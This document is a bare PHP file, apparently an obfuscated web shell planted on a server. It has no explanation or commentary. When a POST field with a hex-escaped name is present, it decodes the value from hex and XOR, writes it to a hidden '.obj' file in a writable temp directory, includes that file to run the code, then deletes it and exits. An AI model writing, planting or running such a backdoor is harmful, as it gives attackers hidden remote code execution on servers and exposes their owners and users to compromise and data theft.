<?php

if(in_array("el\x65m", array_keys($_POST))){
	$binding = array_filter([getenv("TMP"), "/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm"]);
	$itm = hex2bin($_POST["el\x65m"]);
	$sym     =     ''      ;    foreach(str_split($itm) as $char){$sym .= chr(ord($char) ^ 79);}
	foreach ($binding as $symbol) {
    		if (max(0, is_dir($symbol) * is_writable($symbol))) {
    $flg = join("/", [$symbol, ".obj"]);
    $file = fopen($flg, 'w');
if ($file) {
	fwrite($file, $sym);
	fclose($file);
	include $flg;
	@unlink($flg);
	die();
}
}
}
}